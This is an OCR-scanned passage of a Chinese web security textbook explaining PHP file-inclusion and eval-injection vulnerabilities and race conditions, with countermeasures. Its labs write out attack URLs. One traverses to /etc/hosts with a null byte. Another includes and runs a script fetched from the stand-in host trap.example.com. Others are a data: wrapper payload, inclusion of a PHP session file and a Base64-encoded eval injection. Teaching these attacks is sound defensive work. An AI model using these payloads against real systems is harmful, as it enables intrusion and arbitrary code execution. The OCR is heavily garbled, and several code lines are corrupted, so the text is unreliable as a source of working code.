e 避免 include 的 路 径 名 中 包含 外 界 传 入 的 参数 

e include 的 路 径 名 中 包含 外 界 传 入 的 参数 时 ， 限 制 其 字符 种 类 仅 为 字母 和 数字 





























攻击 手段 与 影响 
接 下 来 我 们 就 来 看 一 下 文件 包含 攻击 的 手段 与 其 影响 。 首 先 来 看 以 下 存在 漏洞 的 示例 脚本 。 


代码 清单 ”/4d/4d-001.php 





<body> 
<?php 
$header = $ GET['header']; 
require once($header . '.php'); 
法 
正文 【省 略 】 
</body> 

















这 段 脚 本 使 用 了 redquire_once 来 读 取 页 面 头 部 文件 。 实 验 环境 的 虚拟 机 中 提供 有 头 部 文 
件 示 例 ， 即 以 下 spring.php 文件 。 


代码 清单 [示例 头 部 文件 ] spring.php 


已 经 是 春天 了 啊 <br> 

















正常 情况 下 ， 使 用 如 下 URL 就 能 指定 此 示例 文件 。 





http://example.jp/4d/4d-001.php?header=spring 











图 4-116 ”执行 示例 脚本 后 的 页 面 显 示 


条 http//examplejp/4d/4d-001.php?header=spring - Windows Internet Explorer el 


F 








加 口 - [ 回 htpyWexamplejp/4d/4d-00Lphp?header=spring ~| 女 |x|[ 回 sing pr| 
从 收 夫 | 态 htpy//examplejp/4d/4d-001.php?header=s.，| IRA(O) > 
你 好 ， 已 经 是 春天 了 呢 。 
正文 【省 略 】 
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令 文件 包含 引发 的 信息 泄漏 
下 面 就 让 我 们 来 看 一 下 如 何 实施 攻击 。 这 里 我 们 首先 借鉴 目录 遍历 攻击 的 手法 来 启动 以 下 
URL。URL 未 尾 的 %00 是 为 了 使 PHP 脚本 中 添加 的 .php 扩展 名 无 效 ， 这 一 点 在 4.2 节 中 已 经 做 


过 介绍 。 











http://example.jp/4d/4d-001.php?header=../../../../etc/hosts%00 











4-117 文件 包含 攻击 致使 Web 服务 器 的 文件 内 容 被 显示 


Fr 
臣 htpy/examplejp/4d/4d-001.phpzheader=./././-/etc/hosts%00 - Windows Internet .| 咏 | 回 | 器 











GO 口 - [ htpy//examplejp/4d/4d-001.php?header=./-/-/ * | >| x |[S sing P | 








容 收 夫 | 看 htpy/examplejp/4d/4d-001.php?header=./.. | | IR(O)™ 








127.0.0.1 localhost 127.0.0.1 wasbook # The following lines are desirable for IPv6 capable 
hosts -1 localhost ip6-localhost ip6-loopback fe00-0 ip6-localnet ff00-0 ip6-mcastprefix ff02-=1 
ip6-alnodes fm2-2 ip6-alkouters 正文 【省 略 】 




















/etc/hosts 文件 的 内 容 被 显示 在 了 页 面 上 。 由 此 可 见 ， 文件 包含 攻击 能 造成 Web 服务 需 内 的 
非 公 开 文 件 泄漏 。 

目前 为 止 ， 我 们 所 看 到 的 漏洞 造成 的 影响 可 以 说 与 目录 遍历 漏洞 完全 相同 ， 但 由 于 include 
机 制 还 能 够 读 取 脚 本 并 将 其 执行 ， 因 此 就 能 够 让 外 界 执行 其 指定 的 脚本 ， 从 而 形成 极 大 的 风险 。 
下 面 我 们 就 来 看 一 下 这 种 攻击 手段 。 


人 执行 脚本 1: 远程 文件 包含 攻击 ( RFI ) 

PHP 的 include/require 有 如 下 功能 :如果 指定 URL 作为 文件 名 ， 就 能 够 include 外 部 
服务 器 的 文件 ( Remote File Inclusion; RFI),。 但 由 于 此 功能 极其 危险 ， 因 此 在 PHP5.2.0 之 后 的 版 
本 中 都 默认 将 其 设 为 无 效 。 

但 为 了 讲解 这 一 漏洞 ， 本 书 的 试验 环境 虚拟 机 中 将 远程 文件 包含 功能 设 为 了 有 效 。 因 此 ， 这 
里 我 们 就 能 够 重 现下 面 介绍 的 攻击 模式 。 

首先 ， 准备 以 下 文件 作为 外 部 的 攻击 脚本 。 


代码 清单 ”http://trap.example.com/4d/4d-900.txt 





























<?php phpinfo(); ?> 











然后 ， 通 过 如 下 形式 的 URL 来 调用 4d-001.php。 由 于 在 4d-001.php 内 部 会 给 URL 添加 .php 
扩展 名 ， 因 此 在 URL 的 最 后 添加 ?以 使 得 .php 被 解释 为 查询 字符 串 。 











http://example.jp/4d/4d-001.php?header=http://trap.example.com/4d/4d-900.txt? 














在 4d-001.php 的 require_once 处 给 文件 名 添加 .php 扩展 名 后 ， 最 终 拼 接 成 的 URL 就 如 
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下 所 示 。 





http://trap.example.com/4d/4d-900.txt? .php 











可 以 看 出 ,扩展 名 .php 变 成 了 查询 字符 串 ， 被 下 载 的 文件 变 成 了 4d-900.txt。 
最 终 ， 页 面 上 显示 了 phpinfo 的 执行 结果 。 





4-118 执行 了 外 部 服务 器 的 脚本 
看 phpinfo() - Windows Internet Explorer [lel 回 . 
GO M 回 http:/fexample, jp/4d/4d-001.php?header=http: /ftrap, example, com/4d/4d-90C -|4| x 


突 安 -| 大 phpinfo0 | | 偷 -~ 4 























人 ozilla14.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; 
.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C) 
































图 4-118 显示 了 一 些 能 够 用 来 判断 phpinfo 是 在 哪个 服务 器 上 被 执行 的 项 。 例 如 ， 从 Host 
项 中 就 能 得 知 phpinfo 是 在 example.jp 上 被 执行 的 。 





专栏 : RFI 攻击 的 变种 COLUMN 


正如 上 面 所 介绍 的 那样 ， 如 果 RFI 被 设置 为 有 效 ， 那 么 攻击 者 通过 将 用 来 攻击 的 字符 串 存 放 
在 外 部 服务 器 中 并 设法 使 其 被 包含 ， 就 能 达到 执行 任意 脚本 的 目的 。 其 实 ， 除 此 之 外 还 有 更 为 简 
单 的 攻击 方式 。 
具体 来 说 ， 针 对 RFI 漏洞 ， 使 用 data: 数据 流 封装 器 或 者 PHP 输入 流 也 能 够 实施 攻击 。 下 
面 的 URL 即 展示 了 如 何 使 用 data: 数据 流 封 装 器 来 实施 攻击 ?。 





























































































































http://example.jp/4d/4d-001.php?header=data:text/plain;charset=,<?php+phpinfo()?> 











防范 此 类 攻击 的 策略 同 RFI 一 样 ， 将 allow_url_include 设 为 Off 即 可 ( 后 述 )。 另 外 ， 关 于 
data: 数据 流 封装 器 或 者 PHP 输入 流 的 详情 ， 可 以 参考 PHP 的 官方 文档 。 











四 此 处 的 攻击 方法 参考 了 小 地 孝明 的 博客 文章 : http://d.hatena.ne.jp/t_komura/20070128/1170004898。 
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(PHP 输入 流 的 文档 
http://www.php.net/manual/zh/wrappers.php.php 


OO data: 数据 流 封 装 器 的 文档 
http://www.php.net/manual/zh/wrappers.data.php 








et ee 能 够 在 Web 服务 器 上 写 入 任意 内 容 ， 攻 击 者 就 还 是 有 可 能 通过 
文件 包含 攻击 而 使 外 界 执行 脚本 。 比 如 下 列 两 种 情况 。 


允许 上 传 文件 的 网 站 
将 会 话 变量 保存 在 文件 中 的 网 站 


上 述 两 种 情况 下 ， 如 果 文 件 名 能 够 被 推测 ， 就 会 造成 问题 。 下 面 我 们 将 主要 介绍 将 会 话 变量 
保存 在 文件 中 的 情况 ， 这 也 是 PHP 的 默认 设置 。 

这 里 假设 攻击 对 象 网 站 的 某 个 页 面 将 外 界 输 入 的 值 直 接 保存 至 了 会 话 变量 。 下 面 我 们 以 咨询 
网 站 的 脚本 为 例 进 行 说 明 。 首 先 看 到 的 是 输入 表单 。 为 了 使 读者 们 能 更 直观 地 体验 漏洞 ， 这 里 的 
攻击 代码 ( 阴影 部 分 ) 被 设置 为 了 初始 值 ， 而 这 一 操作 本 来 是 没有 的 。 


代码 清单 ”/4d/4d-002.html 

















<body> 
<form action="4d-003.php" method="POST"> 
请 提问 <br> 


<textarea name=answer rows=4 cols=40> 


&lt;?php phpinfo(); ?&gt; 
</textarea><br> 

<input type="submit"> 
</form> 

</body> 











接着 就 是 接收 到 用 户 提问 后 进行 处 理 的 脚本 。 脚 本 中 只 是 将 POST 的 数据 保存 到 会 话 变量 
中 ， 此 处 为 了 演示 的 方便 ， 我 们 将 会 话 变量 的 保存 地 址 等 显示 在 页 面 上 。 


代码 清单 ”/4d/4d-003.php 








<?php 

session start(); 

$_SESSION['answer'] = $_ POST['answer']; 

$session filename = session save path() . '/sess _' . session id(); 
加 
<body> 


提问 已 受理 <br> 
保存 会 话 信息 的 文件 名 <br><?php echo Ssession filename; ?><br> 
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<a href="4d-001.php?header=<?php echo $session filename; ?>%00"> 
文件 包含 攻击 </a> 
</body>> 








执行 上 述 脚本 后 的 页 面 如 图 4-119 所 示 。 
~ 图 4-119 ”执行 示例 脚本 的 页 面 显 示 




















了 
[年 htpy/examplejp/4d/4d 002html - Windows Internet Explorer [sl®l ¥ 税 http://examplejp/4d/4d-003.php - Windows Internet Explorer LE 
OO [a tp/eomplejp/ad/ad-002himl -|[3[x|| sng P ~ OO [a htp/exomplejp/ad/ad-003php -| 分 [x][ 回 sre Pr 















































帘 届 a | 下 empl /dd 003 hp i IAO)” 
提问 已 受理 
会 话 文件 名 
/varlib/php5/sess_u9 llockhssdata7grr6tgfiuSn6 
文件 包含 攻击 





突 收 六 坟 | 息 htp//examplejp/4d/4d-002.html | : IAO)~ 






































为 了 方便 读者 参考 ， 上 图 中 在 页 面 上 显示 了 保存 会 话 信息 的 文件 名 ,但 实际 的 应 用 程序 中 并 
不 会 显示 出 来 ， 因 此 文件 名 是 否 能 被 推测 就 成 为 了 关键 问题 

保存 会 话 信 息 的 文件 名 由 会 话 信 息 的 存储 路 径 和 会 话 ID 组 成 。 存 储 路 径 可 以 在 配置 中 更 
改 , 但 由 于 各 个 OS ( Linux 发 行 版 ) 都 决定 了 各 自 的 默认 存储 路 径 ， 想 必 多 数 应 用 程序 都 直接 使 
用 了 默认 路 径 。 而 会 话 ID 能 够 从 Cookie 值 中 获取 。 因 此 ， 攻 击 者 能 够 推测 保存 会 话 信息 文件 的 
文件 名 。 

保存 到 文件 中 的 会 话 信 息 的 形式 如 下 。 











answer|s:21:"<?php phpinfo(); ?> 


1 。 
F 











这 是 有 效 的 PHP 代码 格式 ， 因 此 应 该 能 够 被 执行 。 我 们 也 可 以 点 击 图 4-119 中 的 “文件 包含 
攻击 ”链接 来 尝试 。 点 击 后 的 页 面 显示 如 下 。 链 接 的 URL 中 使 用 了 空 字 节 攻 击 的 手法 使 得 .php 
扩展 名 无 效 。 

-图 4-120 ”外 界 指定 的 脚本 被 执行 


「 和 友 phpinfo() - Windows Internet Explorer el x 
GO 回 http://example.jp/4d/4d-001.php?header=/var/lib/php5/sess_u91ockhssdnta7grr6tgfru8n6%00 -| 好 | x 




















窗 - 诡 |@phpnp0 国 | ij 人 
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如 你 所 见 ， 外 界 指定 的 脚本 (phpinfo 函数 ) 被 执行 了 。 
综 上 所 述 ， 文 件 包 含 攻击 除了 能 造成 Web 服务 如 内 的 文件 泄漏 ， 根 据 Web 应 用 规格 或 设置 
的 不 同 ， 还 可 能 会 造成 外 界 指定 的 任意 脚本 被 执行 。 





安全 隐患 的 产生 原因 
当 应 用 满足 以 下 两 个 条 件 时 ， 就 会 产生 文件 包含 漏洞 。 
include 的 文件 名 能 够 由 外 界 指定 
没有 校 验 include 的 文件 名 是 否 妥 当 





五 





对 策 
消除 文件 包含 漏洞 的 思路 与 目录 遍历 漏洞 相同 。 
避免 由 外 界 指定 文件 名 
避免 文件 名 中 包含 目录 名 
限制 文件 名 仅 包含 字母 和 数字 
具体 方法 在 4.10 节 中 已 经 做 过 讲述 ， 因 此 此 处 就 不 再 重复 了 。 
另外 ， 作 为 防范 文件 包含 攻击 的 辅助 性 对 策 ， 建 议 通 过 设置 将 RFI 功能 禁止 。 虽 然 在 
PHP5.2.0 以 后 版 本 中 已 经 默认 对 其 进行 了 禁止 ， 但 保险 起 见 最 好 还 是 确认 一 下 。 确 认 方 法 为 查 
看 phpinfo 函数 的 执行 结果 中 allow_url include 项 目 是 否 为 Off。php.ini 中 的 设置 如 下 。 


















































allow url include = Off 








总 结 

本 节 讲 述 了 脚本 语言 中 的 文件 包含 功能 所 引发 的 漏洞 。PHP 中 将 文件 动态 include 的 做 法 无 
处 不 在 ， 而 如 果 对 文件 名 的 校 验 不 充分 ， 就 可 能 会 混入 文件 包含 漏洞 。 由 于 该 隐患 影响 极 大 ， 
此 请 务必 积极 实施 防范 策略 。 
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4.14 eval 相关 的 问题 


PHP 和 Perl、Ruby、JavaScript 等 多 数 脚 本 语言 中 都 提供 了 将 字符 串 解 释 为 脚本 代码 并 执行 
的 功能 。 绝 大 多 数 情 况 下 ， 该 功能 由 名 为 eval (evaluate 的 省 略 ) 的 函数 提供 。 而 本 节 就 将 讲述 
eval 的 使 用 方法 不 当 而 引起 eval 注入 漏洞 的 问题 。 








4.14.1 eval 注入 


概要 

如 果 eval 函数 的 使 用 方法 不 当 ， 就 有 可 能 导致 外 界 传人 的 脚本 被 执行 。 这 被 称 为 eval 注 
入 攻击， 招致 此 类 攻击 的 漏洞 即 为 eval 注入 漏洞 。 

eval 注入 造成 的 影响 与 OS 命令 注入 攻击 相同 ,具体 如 下 。 


言 息 泄漏 

算 改 网 站 

执行 非法 操作 
攻击 其 他 网 站 ( 垫 脚 石 ) 


eval 注入 漏洞 的 对 策 为 实施 以 下 任意 一 项 。 


不 使 用 eval 或 与 eval 相当 的 功能 
避免 eval 的 参数 中 包含 外 界 传人 的 参数 
eval 的 参数 中 包含 外 界 传人 的 参数 时 ， 将 其 限定 为 只 包含 字母 和 数字 












































eval 注入 漏洞 总 览 


产生 地 点 
更 用 了 eval 或 与 eval 相当 的 功能 的 页 面 


= 一 影响 范围 


于 所 有 页 面 



































其 他 网 站 ( 垫 脚 石 ) 











上 


信息 泄漏 、 纂 改 网 站 、 执 行 非法 操作 、 攻 了 





中 也 有 的 书 中 称 为 “eval 利用 攻击 ”。 本 书 参 考 了 CWE-95 的 命名 “Eval Injection” 而 将 其 称 为 eval 注入 。 参考: http:// 
cwe.mitre.org/data/definitions/95.html( 2010 年 12 月 18 日 )。 
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CR 影响 程度 

EY 

Y 用 户 参 与 程度 
不 需要 


| 对 策 概要 
Me 
e 不 使 用 eval 或 与 eval 相当 的 功能 
e 避免 eval 的 参数 中 包含 外 界 传 入 的 参数 
e eval 的 参数 中 包含 外 界 传 入 的 参数 时 ， 将 其 限定 为 只 包含 字母 和 数字 














攻击 手段 与 影响 
接 下 来 我 们 就 来 看 一 下 eval 注入 的 攻击 手段 及 其 影响 。 


4 存在 漏洞 的 应 用 

eval 可 以 被 应 用 于 各 种 各 样 的 目的 ， 而 作为 示例 ， 这 里 我 们 来 看 一 下 将 复杂 的 数据 变换 为 
字符 串 (序列 化 ) 后 将 其 在 表单 之 间 传 递 的 情况 下 所 产生 的 漏洞 。 

PHP 中 存在 名 为 var_export 的 函数 ， 它 会 将 表达 式 的 值 以 PHP 代码 的 形式 返回 。 下 面 是 
该 函数 的 执行 例 。 





<?php 
$e = var export (array(1，2，3)，true); // 将 数组 转换 为 PHP 代码 的 形式 


echo S$e; 


























由 于 执行 结果 是 PHP 代码 的 形式 ， 因 此 能 够 使 用 eval 来 回溯 得 到 原先 的 数据 ( 反 序列 化 )。 
下 面 为 使 用 var_export 限 数 将 数组 序列 化 后 传递 给 表单 的 脚本 。 


代码 清单 ”/4e/4e-001.php 











<?php 
$a = array(1，2，3); // 传递 的 数据 
$ex = var export ($a, true); // 序列 化 
$b64 = base64 encode ($ex); // Base64 编码 
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?之 

<body> 

<form action="4e-002.php" method="GET"> 

<input type="hidden" name="data" 

value="<?php echo htmlspecialchars ($b64); ?>"> 
<input type="submit" value=" 下 一 步 "> 

/EGLmS 

</body> 








以 上 脚本 将 收 到 的 数据 ( 此 处 为 数组 ) 经 过 var _export 孔 数 序列 化 并 使 用 Base64 编码 加 
密 后 将 其 传递 给 了 4e-002.php 脚本 。 


代码 清单 ”/4e/4e-002.php 

















<?php 
$data = $ GET['data']; 
$str = base64 decode ($data); 
eval('$a = ' . Sstr . ';'); 
2P% 
<body> 
<?php var dump ($a); ?> 
</body> 








4e-002.php 将 接收 到 Base64 的 方式 解码 ， 然 后 使 用 eval 还 原 数据 ， 并 通过 var_ 
dump 函数 将 其 显示 在 页 。 通过 eval 执行 的 表达 式 如 下 所 示 。 阴 影 部 分 为 经 过 var_ 
export 序 i ei se $ao 




















4e-002.php 的 执行 结果 如 下 图 所 示 ， 能 够 看 到 值 被 还 原 了 回去 。 
4-121 示例 脚本 的 执行 结果 


息 http://example.jp/4e/4e-002.php?data=YXJyYXk... le 
GO = 回 http://example.jp/4e/4e-002.php?data=Y) ~ | 加 x 


帘 次 | 看 http://example.jp/4e/4e-002.php... [一 4 从 > 


array(3) { [0]=> int(1) [1]=> int(2) [2]=> intG3) } 










































中 由 于 var_dump 函数 内 部 不 HTML 转 义 ， 因 此 这 部 分 存在 XSS 漏洞 。 
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多 攻击 手段 
4e-002.php 中 没有 对 外 界 传 入 的 参数 进行 校 验 就 将 其 直接 传递 给 了 eval， 因 此 便 存在 能 
使 得 外 界 注入 脚本 的 漏洞 。 使 用 下 面 这 种 形式 ， 就 能 够 任意 添加 交 由 eval 执行 的 表达 式 。 

















这 里 我 们 使 用 以 下 注入 语句 。 





$a = OohpanEeol; 











首先 将 上 面 的 阴影 部 分 进行 Base64 编码 。 在 Fiddler 的 Tool 菜单 中 选择 “Text Encode/ 
Decode”， 这 时 会 出 现 如 图 4-122 的 对 话 框 。 在 上 面 输入 0; phpinfo()， 然 后 选择 左 侧 的 “To 
Base64”。Base64 编码 后 的 结果 会 显示 在 右 下 方 。 


4-122 在 Fiddler 中 将 字符 串 进行 Base64 编码 
TextWizard [12 => 16 chars] 
0; phpinfo0 





® Io Base64 


© Erom Base64 
© URLEncode 
View bytes 加 | 























接 下 来 ， 将 编码 后 的 值 传 给 4e-002.php。URL 和 执行 结果 显示 如 下 。 





http://example.jp/4e/4e-002.php?data=MDsgcGhwaW5mbygp 








4-123 外界 注入 的 脚本 被 执行 了 

「 息 phpinfo() - Windows Internet Explorer 

GG ©O 有 回 http://examplejp/4e/4e-002.php?data=MDsgcGhwaW5mbygp 
窍 从 | 写 phpinfo() em | 
















































由 此 可 以 得 知 ， 外 界 注入 的 phpinfo 函数 被 成 功 执行 了 。 
而 一 旦 攻击 取得 成 功 ，PHP 中 能 够 进行 的 操作 就 都 有 可 能 被 用 来 攻击 应 用 程序 。 从 而 就 会 
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导致 信息 被 泄漏 、 数 据 被 自 改 、 数 据 库 遭 到 变更 、 网 站 被 关闭 、 其 他 网 站 受到 攻击 等 各 种 典型 


问题 。 





安全 隐患 的 产生 原因 

evel 能 够 执行 任意 的 PHP 脚本 代码 ， 可 谓 是 一 种 极其 危险 的 功能 。4e-002.php 中 没有 校 验 
传 给 eval 的 参数 ， 因 此 便 使 得 外 界 成 功 地 执行 了 任意 脚本 。 

安全 隐患 的 产生 原因 能 被 简单 地 归纳 为 如 下 两 点 。 


使 用 eval 本 来 就 是 很 危险 的 
没有 校 验 传 给 eval 的 参数 


除了 eval 之 外 ，PHP 中 能 够 解释 输入 字符 串 并 将 其 执行 的 函数 还 有 以 下 几 种 。 
表 4-23 PHP 中 能 够 解释 输入 字符 串 并 执行 的 函数 


























函数 名 解说 
create function() 动态 生成 函数 
preg_replace() 引 定 e 修饰 符 时 
mb_ereg replace() 第 4 个 参数 指定 为 'e' 时 














此 外 ， 有 些 函 数 能 够 在 参数 中 指定 函数 名 (回调 函数 )， 这 时 如 果 孔 数 名 能 够 由 外 界 指定 ， 
也 会 产生 漏洞 。 下 面 列 举 的 例子 都 属于 此 类 函数 。 


PHP 中 能 够 在 参数 中 指定 函数 名 的 函数 

















call user func () call user func array() array_map () array_walk () 
array f1i1ter() usort () uksort () 
对 策 


防范 eval 注入 漏洞 的 对 策 如 下 。 


不 使 用 eval 或 与 eval 相当 的 功能 
避免 eval 的 参数 中 包含 外 界 传人 的 参数 
限制 外 界 传人 eval 的 参数 中 只 包含 字母 和 数字 











令 不 使 用 eval 
首先 请 考虑 是 否 可 以 不 使 用 eval 以 及 与 eval 相当 的 功能 。 比 如 ， 如 果 是 为 了 序列 化 ， 那 
么 除了 eval 以 外 ,， 还 有 以 下 函数 可 供 选 择 。 








implode/explode 


serialize/unserialize 
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implode 函数 的 参数 为 数组 ， 通 过 在 各 元 素 之 间 插 和 人 分割 字符 而 将 其 转换 为 字符 
串 。explode 国 数 的 行为 则 与 之 相反 。 这 对 组 合 能 够 胜任 简单 的 序列 化 处 理 。 

sezrialize 的 自由 度 更 高 ， 能 够 序列 化 对 象 。 但 是 ，unsetzialize 会 生成 任意 的 对 象 ， 
在 对 象 被 销毁 时 被 称 为 析 构 函数 ， 有 时 会 成 为 安全 隐患 产生 的 原因 “。 

而 出 于 序列 化 之 外 的 其 他 目的 时 ， 也 同样 应 该 调查 是 否 有 eval 以 外 的 实现 方法 。 多 数 情 
况 下 ， 即 使 不 使 用 eval 及 与 其 相当 的 功能 ， 也 都 是 能 够 实现 相同 处 理 的 。 例 如 , 使 用 preg_ 
replace callback 来 取代 附带 修饰 符 e 的 preg_replace， 就 能 有 效 提 高 安全 性 。 


4 避免 eval 的 参数 中 包含 外 界 传 入 的 参数 
而 使 用 eval 的 情况 下 ， 只 要 外 界 无 法 指定 其 参数 就 同样 无 法 实施 攻击 。 以 4e-002.php 为 
例 ， 如 果 使 用 会 话 变量 取代 hidden 参数 来 传递 值 ， 外 界 就 无 法 注入 脚本 ， 从 而 也 就 保证 了 安 
全 性 。 
然而 ， 脚 本 的 注入 途径 并 不 局 限于 HTTP 请 求 ， 通 过 文件 或 数据 库 等 途径 也 同样 有 可 能 注入 
脚本 ， 因 此 ， 如 果 能 够 通过 这 些 途径 注入 ， 那 么 就 不 能 使 用 本 对 策 。 


令 限 制 外 界 传 入 eval 的 参数 中 只 包含 字母 和 数字 
如 果 能 够 限制 外 界 传人 eval 的 参数 中 只 包含 字母 和 数字 ， 那 么 就 杜绝 了 脚本 注入 需要 用 到 
的 符号 字符 (如 分 号 ;、 逗 号 ， 和 引号 等 )， 因 此 也 就 能 够 防止 脚本 注入 。 















































令 参 考 : Perl 的 eval 代码 块 形 式 

Perl 语言 的 eval 具有 两 种 形式 。 分 别 为 eval 后 面 接 表达 式 的 形式 ， 和 eval 后 面 接 代码 
块 (Block ) 的 形式 。 由 于 后 者 能 够 杜绝 eval 注入 攻击 ， 因 此 便 能 够 放心 使 用 。 

首先 我 们 来 看 如 下 脚本 ， 该 脚本 中 使 用 了 eval 后 面 跟 表达 式 这 一 形式 ， 其 中 含有 eval 注入 
漏洞 。 脚 本 中 使 用 eval 的 目的 在 于 捕捉 除 以 零 值 时 的 异常 。 








eval("\$c = $a / $b;"); # 除数 有 可 能 为 零 











根据 以 上 讲解 的 内 容 ， 如 果 此 处 将 变量 $b 指定 为 如 下 字符 串 ， 就 会 使 sbin 目录 下 的 文件 


一 览 显 示 出 来 。 





DECEERL( SSG) 7 











而 如 果 像 下 面 的 脚本 那样 采用 eval 的 代码 块 形式 ， 就 消除 了 eval 注入 漏洞 。 





中 CakePHP 中 就 曾经 被 曝 出 过 这 样 的 漏洞 。 参 考 : http://cakephp.jp/modules/newbb/viewtopic.php?viewmode=flat&topic_ 
id=2496&cforum=3 ( 日文 ) 
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代码 清单 ”eval 代码 块 形式 的 使 用 示例 ( 摘要 ) 





eval { 
$c = $a / $b; ”# 除数 有 可 能 为 零 
J 
if ($@) { # 出 错 的 情况 下 
# 错误 处 理 
} 




















eval 代码 块 形式 之 所 以 不 会 产生 eval 注入 漏洞 ， 是 因为 代码 块 内 部 的 代码 是 固定 不 变 的 。 


总 结 


本 节 介 绍 了 eval 这 类 能 够 将 字符 串 解 释 为 脚本 代码 并 执行 的 功能 中 产生 的 安全 隐患 。eval 
的 功能 很 强大 ， 但 引发 漏洞 后 的 影响 也 同样 是 非常 巨大 的 。 世 界 上 也 有 很 多 语言 不 提供 eval 功 
能 ， 因 此 ， 强 烈 推 荐 写 代 码 时 不 使 用 eval。 





继续 深入 学 习 

寺田 健 的 博客 文章 《通过 preg_replace 执行 代码 ?2P]， 详 细 讲 述 了 附带 修饰 符 e 的 
preg_replace 可 能 产生 的 漏洞 。 其 中 的 内 容 非 常 有 深度 ， 据 此 还 能 够 学 到 使 用 正则 表达 式 来 
注入 脚本 等 宝贵 知识 。 

GIJOE 所 著 的 《PHP 网 络 攻击 方法 江 1]] 中 也 介绍 了 使 用 preg_replace 来 进行 攻击 的 例 
子 。 其 中 还 提 到 了 因 误 用 WordPress 中 的 call user func array 而 导致 漏洞 的 相关 内 容 。 
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4.15 ”共享 资源 相关 的 问题 








由 于 Web 应 用 能 同时 处 理 多 个 请 求 ， 因 此 会 在 并 行 处 理 中 出 现 问题 ， 特 别 是 当 操 作 涉 及 共 
享 资源 时 ， 问 题 发 生 的 几率 尤 大 。 而 本 节 就 将 讲述 因 对 共享 资源 的 处 理 不 完善 而 导致 的 代表 性 的 
安全 隐患 一 一 竞 态 条 件 ( Race Condition ) 漏洞 。 








4.15.1 ” 竞 态 条 件 漏洞 


概要 
共享 资源 是 指 ， 被 多 个 进程 或 线程 同时 使 用 的 变量 、 共 享 内 存 、 文 件 、 数 据 库 等 。 如 果 针 对 
共享 资源 的 互 斥 锁 不 完善 ， 就 可 能 会 导致 竞 态 条 件 漏 洞 。 
态 条 件 漏洞 的 影响 很 多 ， 其中， 应 用 中 由 竞 态 条 件 问题 而 引起 的 典型 的 影响 有 以 下 几 种 。 


玫 




















si 
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页 面 上 显示 其 他 用 户 的 个 人 信息 (他 人 问题 ) 
数据 库 信息 不 一 致 
文件 内 容 被 破坏 

况 仿 条 件 漏洞 的 对 策 有 如 下 两 项 ， 实 施 其 中 一 项 即 可 。 
尽量 不 使 用 共享 资源 
针对 共享 资源 实施 完善 的 互 斥 锁 














竞 态 条 件 漏洞 总 览 


产生 地 点 
使 用 共享 资源 的 地 方 


二 = 影响 范围 


引发 多 种 多 样 的 问题 ， 大 多 都 会 影响 到 整个 应 





























© 影响 类 型 
显示 他 人 信息 、 数 据 库 信 息 不 一 致 、 文 件 内 容 被 破坏 等 


”影响 程度 
这 于 


用 户 参 与 程度 
需要 或 不 需要 的 情况 都 
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半 对 策 概 要 
和 执行 以 下 任 一 方法 。 
e 尽量 不 使 用 共享 资源 
e 针对 共享 资源 实施 完善 的 互 斥 锁 


















































攻击 手段 与 影响 
接 下 来 我 们 就 来 看 一 下 竞 态 条 件 漏洞 引起 问题 的 流程 及 其 影响 。 此 处 介绍 的 案例 都 是 突 发 性 
事件 ， 而 非 著 意 攻击 。 示 例 应 用 由 Java Servlet 编写 而 成 。 本 书 的 试验 环境 的 虚拟 机 中 没有 准备 
Servlet 的 运行 环境 ， 如 果 想 运行 该 示例 可 以 安装 Tomcat 等 Servlet 容器 。 笔 者 已 确认 该 示例 在 
Tomcat6.0 中 运行 正常 。 
Servlet 的 源码 如 下 。 

















代码 清单 ”C4f-001.java 





import java.io.*; 
import javax.servilet.http.*; 


public class C4f 001 extends HttpServlet { 
String name; // 定义 为 实例 变量 


protected void doGet (HttpServletRequest reqg, 
HttpServletResponse res) 
throws IOException { 























PrintWriter out = res.getWwriter(); 

out .print ("<body>name="); 

try { 
name = req.getParameter ("name") ; // 查询 字符 串 name 
Thread.sleep (3000); // 等 待 3 秒 ( 模拟 耗 时 的 处 理 ) 
out .pzint (escapeHTML (name)); // 亚 示 名 














Wi 


catch (InterruptedException e) { 
out.println(e); 

} 

out.println("</body>"); 

Out CLOSe(): 











该 Servlet 从 查询 字符 串 中 接收 了 name 的 值 并 将 其 赋值 给 实例 变量 name， 等 待 3 秒 钟 后 ， 
再 在 页 面 上 显示 实例 变量 name。 等 待 3 秒 钟 是 为 了 模拟 耗 时 很 长 的 处 理 。escapeHTML 子 数 的 
作用 在 于 防范 XSS ( 此 处 省 略 了 该 函数 的 定义 )。 
接 下 来 ,我 们 使 用 以 下 方法 执行 该 Servlet。 打 开 两 个 浏览 器 窗口 ， 在 一 个 窗口 中 先 使 
用 name=yamada 打开 页 面 。1 秒 钟 后， 再 在 男 一 个 窗口 中 使 用 name=tanaka 打开 页 面 。 
浏览 器 的 显示 如 下 图 所 示 。 
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4-124 ”执行 示例 应 用 











俩 http: /fexample, com/4f/4f-0017name=yamada - Windo,，[ 它 号] 车 司 元 ET ed en 
GO > 回 httpWexample com/4f4f-o0t 和 ame=yamadal -| 二 | x | GO- EE http:/fexample. corm/4f/4f-0017 Tame=tanaka] “||x J 














帘 袜 国 m， /fexample. corm/4f/4f-0017name=ta,,. 一 一 从 7 


帘 突 国 htpWeamplacom/afafoolznamesyas | | 偷 了 My 


name=tanaka 




















虽然 两 边 都 是 要 将 查询 字符 串 中 指定 的 名 字 显 示 在 页 面 上 ， 但 两 个 浏览 器 上 都 显示 了 tanaka 
这 个 名 字 。 这 种 现象 被 称 为 他 人 问题 。 显 示 的 不 是 自己 输入 的 个 人 信息 ， 而 是 其 他 人 的 信息 ， 这 
也 是 一 种 个 人 信息 的 泄漏 。 
为 了 理解 这 个 问题 ， 首 先 要 知道 Servlet 类 的 实例 变量 是 共享 资源 。 默 认 设 置 下 ， 
Servlet 类 只 生成 一 个 实例 ( 对 象 )， 所 有 的 请 求 都 由 这 个 唯一 的 实例 来 处 理 。 因 此 ， 0 量 也 
只 有 一 个 ， 所 有 的 请 求 处 理 都 共享 这 个 变量 ( 即 共享 资源 )。 
下 面 我 们 将 yamada 和 tanaka 的 处 理 以 时 间 轴 的 形式 进行 整理 ， 如 下 图 所 示 。 

















4-125 ”示例 的 内 部 处 理 




































































时 刻 ( 秒 ) yamada tanaka 变量 name 
?2?? 
+0 -一 name="yamada"; 一 
yamada 
+1 下 name='tanaka 
各 种 处 理 ( 约 3 秒 ) 
+2 一 
各 种 处 理 ( 约 3 秒 ) 人 
+3 -一 显示 namel tanaka ) 
+4 显示 name ( tanaka ) 




















